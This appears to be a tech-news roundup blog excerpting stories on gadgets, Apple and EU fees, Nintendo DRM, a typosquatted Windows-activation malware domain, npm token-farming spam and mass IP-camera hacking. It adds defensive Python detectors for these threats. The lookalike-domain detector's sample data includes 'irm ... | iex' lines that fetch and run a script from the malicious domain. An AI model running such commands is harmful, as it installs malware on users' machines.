About Robin Edgar


The Pebble Round 2 is here, and it fixes the original’s biggest flaws

2025 was a surprisingly big year for Pebble fans. Last March, former Pebble CEO Eric Migicovsky unexpectedly launched two new Pebble smartwatches: the Pebble 2 Duo and the Pebble Time 2. Now, on just the second day of 2026, Migicovsky has announced a third Pebble smartwatch — the Pebble Round 2.

For all intents and purposes, the Pebble Round 2 is a spiritual successor to the Pebble Time Round, Pebble’s excellent circular smartwatch that was released in 2015. At first glance, the new watch looks indistinguishable from its older sibling. However, there are a couple of key upgrades that fix the original Pebble Time Round’s biggest flaws.

The first is the display. Where the Pebble Time Round featured a 1-inch screen, the Pebble Round 2 has a 1.3-inch screen. A 0.3-inch size upgrade may not sound like much on paper, but as you can see from the photos above, it’s a night-and-day difference when looking at the Pebble Round 2 and Pebble Time Round side by side — largely thanks to the drastically reduced bezels on the new watch.

In addition to the larger size, the Pebble Round 2’s screen is also higher quality, featuring a 260 x 260 resolution that’s twice as sharp as the OG Pebble Time Round. The screen is also now optically bonded, resulting in greatly improved viewing angles compared to the previous model.

The other big upgrade is battery life. Migicovsky says the Pebble Round 2 should last 10 to 14 days per charge, a massive increase over the two days of battery life provided by the original Pebble Time Round (primarily due to newer, more efficient Bluetooth technology). Although it’s not as impressive as the 30-day battery life offered by the other two Pebble watches announced a few months ago, it’s still incredible endurance considering how light and thin the Pebble Round 2 is.

[…]

It has step and sleep tracking, a compass, two microphones, and 30m water resistance. Compared to the Pebble Time 2, the two most prominent missing features on the Pebble Round 2 are a heart rate monitor and a speaker.

[…]

Source: The Pebble Round 2 is here, and it fixes the original’s biggest flaws

LG forced a Copilot web app onto its TVs but will now let you delete it

LG says it will let users delete the Microsoft Copilot shortcut it installed on newer TVs after several reports highlighted the unremovable icon. In a statement to The Verge, LG spokesperson Chris De Maria says the company “respects consumer choice and will take steps to allow users to delete the shortcut icon if they wish.”

Last week, a user on the r/mildlyinfuriating subreddit posted an image of the Microsoft Copilot icon in their lineup of apps on an LG TV, with no option to delete it. “My LG TV’s new software update installed Microsoft Copilot, which cannot be deleted,” the post says. The post garnered more than 36,000 upvotes as people grow more frustrated with AI popping up just about everywhere.

Both LG and Samsung announced plans to add Microsoft’s Copilot AI assistant to their TVs in January, but it appears to be popping up on LG TVs following a recent update to webOS.

De Maria adds that the icon is a “shortcut” to the Microsoft Copilot web app that opens in the TV’s web browser, rather than “an application-based service embedded in the TV.” He also adds that “features such as microphone input are activated only with the customer’s explicit consent.”

Asked when LG will start letting users delete the Copilot icon, De Maria said there’s no “definitive timing” yet.

Here’s LG’s full statement:

Following recent coverage regarding the arrival of Microsoft Copilot on LG TVs, we’re reaching out to provide an important clarification. Based on recent coverage regarding the arrival of Microsoft Copilot on LG TVs, we want to clarify that Microsoft Copilot is provided as a shortcut icon to enhance customer accessibility and convenience. It is not an application-based service embedded in the TV. When users select the Copilot shortcut, Microsoft’s website opens through the TV’s web browser, and features such as microphone input are activated only with the customer’s explicit consent.

Source: LG forced a Copilot web app onto its TVs but will let you delete it | The Verge

Apple becomes a debt collector with its new developer agreement, could randomly deduct money it believes it should get if devs use external payment processor or app store

Apple on Wednesday released an updated developer license agreement that gives the company permission to recoup unpaid funds, such as commissions or any other fees, by deducting them from in-app purchases it processes on developers’ behalf, among other methods.

The change will impact developers in regions where local law allows them to link to external payment systems. In these cases, developers must report those payments back to Apple to pay the required commissions or fees.

The changed agreement seemingly gives Apple a way to collect what it believes is the correct fee if the company determines a developer has underreported their earnings.

Apple’s policies in this area are complex, but the change could impact developers in markets like the EU, U.S., and, now, Japan, where developers using external payment systems may be required to pay Apple varying fees or commissions depending on local law. (In the U.S., the legality of these commissions is still being disputed. A federal appeals court earlier this month ruled that a district court should consider allowing Apple to collect some commission, though not the full 27% fee it previously charged.)

In its new developer agreement, Apple states it will “offset or recoup” what it believes it is owed, including “any amounts collected by Apple on your behalf from end-users.” This means Apple could recoup funds from developers’ in-app purchases — like those for digital goods, services, and subscriptions — or from one-time fees for paid applications.

Additionally, Apple notes that it has the right to collect this money “at any time” and “from time to time,” meaning developers could face surprise deductions if Apple believes they’ve miscalculated what they owe.

The agreement doesn’t specify how Apple will determine whether it’s owed money.

The types of developer payments that vary over time are limited and include commissions, fees, and taxes. Among these is the Core Technology Fee (CTF) in the EU, which currently costs €0.50 for each first annual install exceeding one million in the past 12 months. In January 2026, Apple will transition from the CTF to a new fee, called the Core Technology Commission (CTC), a more complicated percentage-based fee. Apple will collect the CTC from apps that use external payment methods or are distributed under its alternative business terms for the EU.

The updated developer agreement also gives Apple the right to collect unpaid amounts from any “affiliates, parents, or subsidiaries” related to the account that owes money. In practical terms, that means Apple could collect the money from developers’ other apps, or from apps published by a parent company.

[…]

Source: Apple becomes a debt collector with its new developer agreement | TechCrunch

So after being forced by the EU (and others) to allow external payment providers and app stores, Apple then went into a hissy fit and started stamping its feet against these rulings, trying everything to keep extorting anyone selling anything on an iOS device. Now it’s just going to take what it believes is theirs – and you had better believe there will be no recourse.

Apple thinks it can argue its way out of EU DMA with a single comma. No it can’t and this fight will cost it billions in Europe

EU to force Apple to open up iOS for developers

Apple tries again to make EU officials happy with new fees for in-app purchases

Apple stamps feet but now to let EU developers distribute apps from the web

Apple reverses hissy fit decision to remove Home Screen web apps in EU

EU forces Apple to open up to third-party app stores and payments. Details emerge what it will look like.

I can have app store? Apple: yes but NO! Give €1,000,000 + lock in to Apple ecosystem. This is how to “comply” with EU anti competition law

Hubble Sees Possible Runaway Black Hole Creating a Trail of Stars

[…] if it were in our solar system, it could travel from Earth to the Moon in 14 minutes. This supermassive black hole, weighing as much as 20 million Suns, has left behind a never-before-seen 200,000-light-year-long “contrail” of newborn stars, twice the diameter of our Milky Way galaxy. It’s likely the result of a rare, bizarre game of galactic billiards among three massive black holes.

Rather than gobbling up stars ahead of it, like a cosmic Pac-Man, the speedy black hole is plowing into gas in front of it to trigger new star formation along a narrow corridor.

[…] Nothing like it has ever been seen before, but it was captured accidentally by NASA’s Hubble Space Telescope.

This is an artist’s impression of a runaway supermassive black hole that was ejected from its host galaxy as a result of a tussle between it and two other black holes. As the black hole plows through intergalactic space it compresses tenuous gas in front of it. This precipitates the birth of hot blue stars. This illustration is based on Hubble Space Telescope observations of a 200,000-light-year-long “contrail” of stars behind an escaping black hole.
NASA, ESA, Leah Hustak (STScI)

“We think we’re seeing a wake behind the black hole where the gas cools and is able to form stars. So, we’re looking at star formation trailing the black hole,” said Pieter van Dokkum of Yale University in New Haven, Connecticut. “What we’re seeing is the aftermath. Like the wake behind a ship we’re seeing the wake behind the black hole.” The trail must have lots of new stars, given that it is almost half as bright as the host galaxy it is linked to.

The black hole lies at one end of the column, which stretches back to its parent galaxy. There is a remarkably bright knot of ionized oxygen at the outermost tip of the column. Researchers believe gas is probably being shocked and heated from the motion of the black hole hitting the gas, or it could be radiation from an accretion disk around the black hole. “Gas in front of it gets shocked because of this supersonic, very high-velocity impact of the black hole moving through the gas. How it works exactly is not really known,” said van Dokkum.

“This is pure serendipity that we stumbled across it,” van Dokkum added. He was looking for globular star clusters in a nearby dwarf galaxy. “I was just scanning through the Hubble image and then I noticed that we have a little streak. I immediately thought, ‘oh, a cosmic ray hitting the camera detector and causing a linear imaging artifact.’ When we eliminated cosmic rays we realized it was still there. It didn’t look like anything we’ve seen before.”

This Hubble Space Telescope archival photo captures a curious linear feature that is so unusual it was first dismissed as an imaging artifact from Hubble’s cameras. But follow-up spectroscopic observations reveal it is a 200,000-light-year-long chain of young blue stars. A supermassive black hole lies at the tip of the bridge at lower left. The black hole was ejected from the galaxy at upper right. It compressed gas in its wake to leave a long trail of young blue stars. Nothing like this has ever been seen before in the universe. This unusual event happened when the universe was approximately half its current age.
NASA, ESA, Pieter van Dokkum (Yale); Image Processing: Joseph DePasquale (STScI)

Because it was so weird, van Dokkum and his team did follow-up spectroscopy with the W. M. Keck Observatories in Hawaii. He describes the star trail as “quite astonishing, very, very bright and very unusual.” This led to the conclusion that he was looking at the aftermath of a black hole flying through a halo of gas surrounding the host galaxy.

[…]

Source: Hubble Sees Possible Runaway Black Hole Creating a Trail of Stars – NASA Science

New Nintendo DRM allows them to remotely brick the device you bought permanently – you don’t own what you bought part XXX

In the lead up to its Switch 2 console release, Nintendo updated its user agreement and asserted broad authority to make consoles owned by its customers permanently unusable. Under Nintendo’s most aggressive digital restrictions management (DRM) update to date, game console owners are now required to give Nintendo the unilateral right to revoke access to games, security updates, and the Internet, at its sole discretion. The new agreement states:

“You acknowledge that if you fail to comply with [Nintendo’s restrictions], Nintendo may render the Nintendo Account Services and/or the applicable Nintendo device permanently unusable in whole or in part.”

These new, wide-sweeping restrictions affect a large number of users for many different reasons. There are probably other reasons that Nintendo has and will justify bricking game consoles, but here are some that we have seen reported:

  • “Tampering” with hardware or software in pretty much any way;
  • Attempting to play a back-up game;
  • Playing a “used” game; or
  • Use of a third-party game or accessory.

When Nintendo remotely bricks a perfectly-functional device, the game console becomes effectively useless. Users are blocked from ever accessing the Internet again with the system, which in turn restricts services like eShop (the digital distribution service for the Nintendo Switch), online play, using the subscription-based Nintendo Switch Online (which includes access to retro game catalogs and the ability to back up game data), game download (including previously-purchased codes and “game-key” cartridges), and security patches. As if blocking Internet access alone wasn’t enough, a bricked device is no longer able to play downloaded games, either. These restrictions don’t just apply to the user who broke Nintendo’s extremely strict user agreements: the block is for the life of the device, no matter who owns it.

No proprietor should have the power to brick your device at its discretion.

Nintendo’s promise to block a user from using their game console isn’t just an empty threat: it has already been wielded against many users.

[…]

Source: New Nintendo DRM bans consoles, makes users beg for forgiveness — Free Software Foundation — Working together for free software

Samsung is putting Google Gemini AI into your refrigerator and wine cellar, whether you need it or not

Samsung is heading into CES 2026 with a familiar message wrapped in a slightly stranger package. You see, the company plans to unveil an updated lineup of kitchen appliances, led by new versions of its Bespoke AI refrigerator, wine cellar, slide in range, and over the range microwaves. What makes this year different is not the stainless finish or the tighter installation tolerances. It is the decision to push Google Gemini directly into the kitchen, starting with a refrigerator that can see what you eat and tell the cloud about it. Yes, really.

At the center of the announcement is the latest Bespoke AI Refrigerator Family Hub from Samsung Electronics. Samsung says this model upgrades its existing AI Vision system with functionality built using Google Gemini, marking the first time Gemini is being integrated into a refrigerator. Previously, the system could recognize a limited number of fresh and pre registered foods locally. The new version is designed to identify more items automatically, including processed foods that no longer require manual setup and leftovers stored in personal containers.

On paper, that sounds convenient. A fridge that knows what is inside it, keeps an updated inventory, and helps manage groceries without constant user input is an idea appliance makers have chased for years. Samsung says more accurate ingredient recognition should make food tracking clearer and easier, while unlocking new use cases around meal planning and personalization. Whether that translates into daily value or becomes another ignored dashboard remains an open question.

Samsung is also extending the same vision based approach to its new Bespoke AI Wine Cellar. A camera mounted inside the unit scans bottle labels as wine is added or removed, tracking inventory through the SmartThings AI Wine Manager. The system knows which shelf each bottle sits on and can surface pairing suggestions based on what is currently stored. For collectors with larger wine inventories, this could genuinely save time. For everyone else, it may feel like a high tech solution searching for a problem.

The elephant in the room is cloud dependency. These AI features are built in collaboration with Google Cloud, which raises predictable questions about data handling, long term support, and what happens when services change or are discontinued. A refrigerator is expected to last many years. Cloud based AI services do not have the same track record. Samsung has not detailed how much processing happens locally versus in the cloud, nor how users can limit or disable data sharing if they choose.

[…]

Source: Samsung is putting Google Gemini AI into your refrigerator, whether you need it or not

Fake MAS Windows activation domain used to spread PowerShell malware

A typosquatted domain impersonating the Microsoft Activation Scripts (MAS) tool was used to distribute malicious PowerShell scripts that infect Windows systems with the ‘Cosmali Loader’.

BleepingComputer has found that multiple MAS users began reporting on Reddit [1, 2] yesterday that they received pop-up warnings on their systems about a Cosmali Loader infection.

You have been infected by a malware called ‘cosmali loader’ because you mistyped ‘get.activated.win’ as ‘get.activate[.]win’ when activating Windows in PowerShell.

The malware’s panel is insecure and everyone viewing it has access to your computer.

Reinstall Windows and don’t make the same mistake next time.

For proof that your computer is infected, check Task Manager and look for weird PowerShell processes.

Based on the reports, attackers have set up a look-alike domain, “get.activate[.]win,” which closely resembles the legitimate one listed in the official MAS activation instructions, “get.activated.win.”

Given that the difference between the two is a single character (“d”), the attackers bet on users mistyping the domain.

Source: Fake MAS Windows activation domain used to spread PowerShell malware
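
A defender can catch the one-character slip described above by comparing every host seen in PowerShell command-line or script-block logs against the hosts that are expected. The sketch below is an added example, not code from BleepingComputer or the MAS project; the log lines, the distance threshold of 2 and all function names are assumptions, and it generalises from a dropped letter to swapped letters as well.

```python
import re

# Hosts the organisation expects to see. get.activated.win is the legitimate
# MAS domain named in the article; extend the set for your own environment.
TRUSTED_HOSTS = {"get.activated.win"}

# Loose host matcher: dotted labels ending in an alphabetic, TLD-like label.
HOST_RE = re.compile(r"(?:[a-z0-9-]+\.)+[a-z]{2,}", re.IGNORECASE)


def refang(text):
    """Undo '[.]' defanging so indicators and raw logs compare equal."""
    return text.replace("[.]", ".")


def osa_distance(a, b):
    """Edit distance counting insert, delete, substitute and adjacent swap."""
    prev2 = None
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i] + [0] * len(b)
        for j, cb in enumerate(b, 1):
            cost = 0 if ca == cb else 1
            cur[j] = min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost)
            # Adjacent transposition ("actiavted" for "activated").
            if prev2 is not None and j > 1 and ca == b[j - 2] and a[i - 2] == cb:
                cur[j] = min(cur[j], prev2[j - 2] + 1)
        prev2, prev = prev, cur
    return prev[len(b)]


def classify_host(host, trusted=TRUSTED_HOSTS, max_distance=2):
    """Return (verdict, nearest_trusted_host, distance) for one host name."""
    host = host.lower()
    if host in trusted:
        return ("trusted", host, 0)
    distance, nearest = min((osa_distance(host, t), t) for t in trusted)
    if distance <= max_distance:
        return ("lookalike", nearest, distance)
    return ("unknown", None, None)


def scan_command_lines(lines):
    """List (line_no, host, nearest_trusted, distance) for lookalike hosts."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        for host in HOST_RE.findall(refang(line)):
            verdict, nearest, distance = classify_host(host)
            if verdict == "lookalike":
                findings.append((line_no, host.lower(), nearest, distance))
    return findings


# Constructed sample command lines (not real telemetry). The lookalike from
# the article is kept defanged here and only re-fanged in memory.
SAMPLE_COMMAND_LINES = [
    "irm https://get.activated.win | iex",
    "irm https://get.activate[.]win | iex",
    'powershell.exe -NoProfile -Command "irm https://example.org/setup.ps1 | iex"',
    "irm https://get.actiavted.win | iex",
]

if __name__ == "__main__":
    for line_no, host, nearest, distance in scan_command_lines(SAMPLE_COMMAND_LINES):
        print(f"line {line_no}: {host} is {distance} edit(s) from {nearest}")
```

Hosts that are neither trusted nor close to a trusted name come back as "unknown" and are left to other controls; the check only targets near-misses of names you already rely on.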

Samsung Releases new Odyssey gaming monitors, including 27″ glasses free 3D

[…]

Samsung Odyssey 3D G9 – G90XF 27”

The Samsung Odyssey 3D G9 – G90XF 27″ gaming monitor breaks new ground with glasses-free 3D. The technology incorporates eye tracking to create a striking depth effect in games and videos.

The 27″ (68cm) Samsung Odyssey 3D G9 – G90XF 4K UHD monitor features glasses-free 3D technology. Thanks to eye tracking and the View Mapping algorithm, the image adapts to the user’s position to create dynamic depth. It can also automatically convert 2D videos into 3D content thanks to AI processing. The screen uses an IPS panel with a refresh rate of 165Hz, a response time of 1 ms and 99% coverage of the sRGB space.

It is FreeSync Premium and G-Sync Compatible, guaranteeing smooth synchronization with the graphics card. Connectors include two HDMI 2.1 ports, one DisplayPort 1.4 and a USB port. The Reality Hub interface centralizes 3D functions and provides access to compatible games. It’s ideal for those who want to discover 3D without constraints, while retaining solid performance for gaming and multimedia uses.

[…]

Source: Samsung Odyssey: new 2025 gaming monitors – Son-Vidéo.com: blog

Tea – a way to secure FOSS by offering financial incentives – brews massive token farming campaigns (and dissolves them)

No good idea – like rewarding open source software developers and maintainers for their contributions – goes unabused by cybercriminals, and this was the case with the Tea Protocol and two token farming campaigns.

Both incidents gave the project’s founders a real-time view into how far – and fast – attackers will go to chase financial gain, and they helped shape “radical changes” that will roll out in the Tea network’s mainnet launch early next year, co-founder and CEO Tim Lewis told The Register.

The Tea Protocol was founded by Max Howell, who created open source package manager Homebrew, and Lewis, who established DEVxDAO, a non-profit that distributes grants to support decentralized computing projects, to reward open source developers and help secure software supply chains via financial incentives.

“When you think about the different package management ecosystems, they all have different gates in front of them, and none of them have been a financial gate,” Lewis said in an interview.

“There’s a human that sits in the front who has to be this gate, but it takes a toll on the human to go through all the data, and that’s only getting worse,” he said. “There’s the proliferation of the AI-induced pull requests, which are great, but that’s become like a DDoS attack.”

Last year, the duo rolled out the Tea Protocol testnet – essentially a test run for the incentives program that allows open source developers to earn cryptocurrency – specifically Tea tokens – for valuable code and fixes, while users can stake Tea to support specific projects and also earn rewards. A portion of the protocol rewards is shared with project maintainers and users who stake their tokens.

“Again, this was on a test network for fake internet points that could eventually potentially have some value,” Lewis said. “Our incentive for that period only lasted about three weeks.”

In April 2024, the Tea team shut down the incentive program’s rewards after about 15,000 spammy packages flooded the npm registry to farm Tea points. These contained little or zero useful functionality, and were instrumented with “tea.yaml” metadata that linked back to Tea accounts in an attempt to inflate developers’ reputation and earn payouts.

“We got to watch this happen in real time, and we recognized how fast, how far people had gone to create scripts that have a worm-like behavior,” Lewis said.

Then it got worse. In 2025, the earlier Tea farming campaign grew into the IndonesianFoods and Indonesian Tea campaigns that polluted more than 1 percent of npm with spam packages. And in November, Amazon uncovered more than 150,000 malicious npm packages, all linked to another Tea token farming campaign, that the cloud giant described as “one of the largest package flooding incidents in open source registry history.”

“I view this as a canary in the coal mine,” Lewis said.

In these token farming campaigns, the fraudsters flooded registries with spam, as opposed to cryptocurrency- and other secret-stealing laced code –  and neither of the latter two is hypothetical. North Korea’s Lazarus Group and other sophisticated attackers have previously targeted npm for these illicit purposes.

“When you are a destructive organization like Lazarus Group, there’s incentive to use these same techniques to attack [supply chains],” Lewis said. “So we need to fix the core.”

How to reward secure code and penalize spam

To this end, Tea’s founders are working to fix the protocol’s design to ensure that the incentives program can’t be abused when the mainnet launches in early 2026.

This involves requiring packages and projects to pass ownership and provenance checks, and ensuring contributions aren’t just automated spam. The Tea team is also designing monitoring features that will check for Sybil attacks and flag surges in low-quality package creation and suspicious identities.

If malicious-looking patterns are detected, the developer won’t receive rewards and their registrations will be quarantined, pending further review.

Additional key quality and security improvements will happen via integration with PKGX, which Howell wrote. It’s a package runner that creates a containerized environment for projects and manages developer tools across environments. PKGX verifies maintainers using cryptographic signatures and identity checks, and also evaluates their contributions to various projects for quality, along with security posture and dependencies.

This registry will integrate directly with Tea upon the protocol’s mainnet launch, and will auto-detect and penalize, if needed, spammy packages at the point of registration – not after – while rewarding maintainers for their legit contributions.

Automated SBOMs, bug bounties

In the future, Lewis says that this design will also allow enterprises to automate bug bounties, and SBOMs (software bills of materials) that provide an inventory of all the components found in a piece of software. This will make it easier for large companies to map out their dependencies, and then reward developers for fixing any critical security issues they find.

[…]

“Some CISO, somewhere, every day is looking at his tens of thousands of packages that he approved for use, and now he’s responsible for whether or not these things are secure,” Lewis said. “He can’t have all the people that work within his department spend all of their time trying to get some guy in Nebraska to review a pull request and get the critical bug for his architecture solved en masse. We’re hoping this creates a tool that allows that value distribution without impermanent loss en masse.”

Lewis’ goal, he says, is to see upwards of “millions of dollars a day, retrieved for issue completion.”

Project developers and maintainers write the fixes, and chief security officers can confirm to their boards of directors that their dependencies and critical code is secure. “Plus, the meantime for resolution for these issues comes down – and they are not funding groups like North Korea’s Lazarus,” he added.

In other words: Tea’s goal reaches fruition. Open source project maintainers get paid for their valuable work, code becomes more secure, financially motivated crews can’t game the system, and the world becomes a better place. ®

Source: CEO spills the Tea about massive token farming campaigns • The Register
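
The article describes monitoring that flags surges in low-quality package creation and suspicious identities, then quarantines the registrations for review. The sketch below is an added example of that kind of check and is not Tea's or PKGX's code; the record fields (`tea_account` standing for the account a package's tea.yaml links to, `code_bytes` for the size of its source), the thresholds and the sample records are all assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Hypothetical thresholds; tune them against real registry traffic.
WINDOW = timedelta(hours=1)
MIN_CODE_BYTES = 200             # below this a package counts as low-content
MAX_LOW_CONTENT_PER_WINDOW = 3   # low-content registrations tolerated per window
MAX_PUBLISHERS_PER_ACCOUNT = 2   # registry identities tolerated per reward account


def peak_in_window(timestamps, window):
    """Largest number of timestamps that fall inside any span of `window`."""
    ts = sorted(timestamps)
    best = start = 0
    for end in range(len(ts)):
        while ts[end] - ts[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def review_registrations(records):
    """Map each reward account to the reasons its registrations are held."""
    by_account = defaultdict(list)
    for rec in records:
        if rec["tea_account"]:          # packages with no reward link are skipped
            by_account[rec["tea_account"]].append(rec)

    quarantined = {}
    for account, recs in by_account.items():
        reasons = []
        # Surge signal: many near-empty packages registered in a short burst.
        low_content = [r["published"] for r in recs if r["code_bytes"] < MIN_CODE_BYTES]
        peak = peak_in_window(low_content, WINDOW)
        if peak > MAX_LOW_CONTENT_PER_WINDOW:
            reasons.append(("surge", peak))
        # Sybil signal: many registry identities feeding one reward account.
        publishers = {r["publisher"] for r in recs}
        if len(publishers) > MAX_PUBLISHERS_PER_ACCOUNT:
            reasons.append(("many_publishers", len(publishers)))
        if reasons:
            quarantined[account] = reasons
    return quarantined


# Constructed sample registrations (not real registry data).
_BURST = datetime(2024, 4, 1, 12, 0)
SAMPLE_REGISTRATIONS = [
    {"name": f"pkg-{i}", "publisher": f"user{i % 3}", "tea_account": "acct-farm",
     "code_bytes": 40, "published": _BURST + timedelta(minutes=2 * i)}
    for i in range(5)
] + [
    {"name": "parser-lib", "publisher": "dev1", "tea_account": "acct-dev",
     "code_bytes": 12000, "published": datetime(2024, 1, 10, 9, 0)},
    {"name": "tiny-helper", "publisher": "dev1", "tea_account": "acct-dev",
     "code_bytes": 150, "published": datetime(2024, 3, 2, 15, 30)},
    {"name": "unlinked", "publisher": "dev2", "tea_account": None,
     "code_bytes": 30, "published": _BURST},
]

if __name__ == "__main__":
    for account, reasons in review_registrations(SAMPLE_REGISTRATIONS).items():
        print(account, reasons)
```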

Mass hacking of IP cameras leave Koreans feeling vulnerable in homes, businesses

[…]hackers recently breached approximately 120,000 IP cameras across Korea — often found inside private homes like Kim’s — has left her and many others seething, prompting the government to take action.

As shocking as the scale of the intrusions was the alleged motive behind them. Videos captured by the hacked cameras were allegedly sold to an overseas pornography website, exposing some of the most intimate moments of unsuspecting victims to anonymous viewers abroad.

Only 1,193 videos from the hacked cameras have been uncovered so far on overseas websites, raising concerns that many more remain undiscovered.

In response, an interagency task force comprising officials from the Ministry of Science and ICT, the Personal Information Protection Commission and the National Police Agency announced on Dec. 7 that it would pursue a multilayered reform package. The measures aim to shift responsibility beyond individuals and camera manufacturers to include installation companies and telecommunications providers.

Yet as policymakers scramble to overhaul regulations and reinforce technical safeguards, interviews with everyday users of IP cameras reveal a gap between how these devices are used and understood and the level of risk they actually pose.

[…]

Many hacked cameras were protected by simple or widely known passwords that were rarely changed. A government survey found that only 59 percent of installation companies consistently carried out mandatory security measures, such as changing default password settings.

[…]

What sets the current case apart — and prompted the government’s unusually forceful response — is the nature of the harm involved.

Police believe one suspect hacked 63,000 IP cameras, producing 545 videos that he sold to an overseas website for 35 million won ($24,000) in cryptocurrency. Another suspect allegedly hacked 70,000 devices, creating 648 videos that he later sold to the same website for 18 million won.

The two individuals, whom police say are not accomplices, sourced most of their footage from IP cameras installed in ordinary homes, gynecology offices, breastfeeding rooms, massage parlors, Pilates studios and waxing salons. They often accessed the same compromised devices repeatedly. The videos accounted for 62 percent of all content on the website, which includes a separate “Korean” category.

Two additional suspects are accused of hacking 15,000 cameras and 136 devices, respectively, to collect footage for private possession.

Unlike leaked phone numbers or delivery addresses, compromised IP camera footage can expose faces, bodies, children and private spaces. Prof. Kim emphasized that hacked cameras can reveal “an individual’s movements, daily life and relationships,” making the potential for privacy violations “extremely high.”

[…]

Source: Mass hacking of IP cameras leave Koreans feeling vulnerable in homes, businesses

New Jolla Phone Pre-orders hit target quickly. Shows people are fed up with iOS-Android monopoly

After successful crowdfunding, the latest release of the original handheld Linux distro will power a new handset coming in mid-2026.

The initial crowdfunding drive for the new Jolla Phone seems to have gone well: at the time of writing, the new device has comfortably passed double the number of orders needed to go into production. Finnish vendor Jolla set a goal of 2,000 €99 pre-order deposits by January 4th, but passed the goal in less than two weeks. The first batch of 2,700 units were £499. Batch 2 will ship two to four weeks later, and cost €549, but that’s now sold out too. Currently, well over 5,000 orders have been placed. With 20 days to go, the pre-order page says:

We take a maximum of 10,000 pre-orders until January 31st, 2026. Reserve your spot and lock your special total price of 579€.

The new Jolla Phone, resplendent in The Orange – or Snow White and Kaamos Black

The down payment will be deducted from the total price. Jolla is now taking orders for 5,200 units in batch 3, which will cost €579 and ship three to six weeks later. After the first few production runs, totalling 10,000 units, the price of the handset will go up to €599 to €699.

The phone specs were set by a survey the company ran, with a first stage in August followed by a November update. To our eyes it looks decent if not outstanding: 5G connectivity, a 6.36 inch AMOLED screen, an indicator LED, 12 GB of RAM plus 256 GB of storage expandable via microSDXC. Some of the details are welcome: a user-replaceable 5,500 mAh battery, plus a software-based privacy switch which can disable the microphone, or Bluetooth, or Android apps, or other programmable options. For this vulture, a sad absence is a headphone socket.

An added incentive, if the device sells 10,000 units, is the return of smart back covers called The Other Half, which even included a keyboard.

[…]

Sailfish is distinct from any other mobile OS today. Its origins at Nokia predate the January 2007 launch of the iPhone, by whose prospects The Reg was not enthralled. That, of course, also means it was out long before Android, which as Daring Fireball described in 2010 was originally designed to rival Blackberry. (The Internet Archive still has some of Engadget’s screenshots.) After Android was remodeled to take on Apple, both OSes look a lot like each other: the home screen is a grid of app icons, and both lean heavily on tapping on-screen buttons. (Before that, of course, they relied on physical buttons.)

[…]

Sailfish 5 feels very different, with little visible influence from anything else. You flip between its two home screens by swiping left and right. One holds a list of messages and notifications, and the other is a full-screen app switcher, with tiles for each open app. Dragging up from the bottom reveals the app launcher. Uniquely, it distinguishes between long and short drags down from the top of the screen: a long fast swipe down opens a settings panel, but in native Sailfish apps, a short slow drag opens a full-screen-width menu; you scroll up and down until the desired option is highlighted, then select it by lifting your thumb. It shows whether options are turned on or off with a large, bright white dot, or a smaller dimmer dot. A different white dot at top left is also the Back button, where one makes sense.

Like the overloaded white-dot symbol, some aspects of the OS are a little confusing. In addition to the official Jolla Store, there are two different tools for managing third-party native apps: StoreMan manages software from the collection on OpenRepos, and Chum GUI manages RPM packages from Chum. Then there’s the built-in AppSupport compatibility layer, which lets you run Android apps. We installed both F-Droid and the Aurora store, and had no problems installing any typical tools such as Signal, Whatsapp, or YouTube Kids.

There are built-in apps for all the things you’d expect a smartphone to do, and these connect to the usual suspects such as Google’s email, calendar, and contacts. There’s a browser based on Mozilla tech, as well, which works fine – as did Android browsers such as Vivaldi. Like its very distant relative Symbian, though, this is a local-first sort of device which can sync, rather than a pocket cloud client.

Maps are a particular weak point: we tried Google Maps and Nokia spin-off Here, which both literally drew a blank. The OpenStreetMap-based Mapy.com ran and could be searched, but couldn’t detect our location. There aren’t many cloud-storage clients, either. The stock keyboard doesn’t support swipe-style text entry, which we found frustrating.

Overall, Sailfish is arguably the most complete independent mobile OS. It’s totally separate from anything from Google, or Apple, or desktop Linux, and the app catalog is impressive. We did regularly get lost in its slightly idiosyncratic UI, but it was always possible to get out again. If you want a total break from the mainstream mobile duopoly, this is a viable alternative. Although you might need a standalone sat-nav too.

[…]

Source: New Jolla, Sailfish 5, offer break from iOS-Android monopoly • The Register

Devs say Apple still flouting EU’s DMA six months on, but cutting fees in US

Six months after EU regulators found Apple’s App Store rules

The Coalition for App Fairness, a nonprofit organization of app developers and consumer groups, has accused Apple of persistent non-compliance with the DMA, warning that the company’s revised App Store terms continue to impose fees which the legislation prohibits.

In an open letter addressed to European Commission President Ursula von der Leyen and senior commissioners, the coalition argues that Apple has failed to deliver “any meaningful changes or proposals” despite an April 2025 non-compliance decision that found its App Store policies illegal and harmful to both developers and consumers.

At the heart of the complaint is money. The DMA requires so-called gatekeepers to allow developers to offer and conduct transactions outside their app stores without charge. Apple, the coalition claims, is seeking to charge commissions of up to 20 percent on those very transactions.

“This is a blatant disregard for the law with the potential to vanquish years of meaningful work by the Commission,” the letter states, accusing Apple of preserving the economics of its App Store while nominally claiming compliance.

Apple has said it will roll out new App Store terms in January 2026, but developers say the company has provided no clarity on what those changes will involve or whether they will actually comply with the DMA.

“We have seen this playbook before in Europe and beyond,” the signatories warn, adding that they suspect any new terms will continue to impose fees that would violate the law.

The letter argues that this uncertainty is already doing damage. Six months after Apple’s last App Store terms update, developers still do not know which rules will govern their businesses or what their costs will look like in the near term.

Apple’s “lack of transparency in tandem with its rushed timelines,” the coalition says, is freezing investment and innovation, effectively allowing the company to “exploit its gatekeeper position by holding the entire industry hostage.”

The group also points to a growing transatlantic contrast that makes Europe look like the tougher regulator with the weaker results. While Apple continues to fight DMA enforcement in the EU, US courts have moved to curb its ability to extract fees from external transactions. Following litigation brought by Epic Games, developers in the US can now communicate freely with customers about pricing and offer payment options outside Apple’s ecosystem without paying commission.

That raises what the coalition calls a “simple and urgent question.” Why should European developers and consumers get a worse deal than their US counterparts, especially when the EU was first to pass a landmark law aimed at fixing digital markets?

[…]

Source: Devs say Apple still flouting EU’s DMA six months on • The Register

Pimax debuts Crystal Super Micro-OLED, Dream Air, & Dream Air SE – light 8k VR

Pimax, a manufacturer of virtual reality (VR) hardware, debuted its next generation of PC virtual reality (PCVR) headsets to the public at CES 2026. The company demonstrated the final production model of the ‘Crystal Super Micro-OLED,’ alongside its new ‘Dream Air’ and ‘Dream Air SE’ devices.

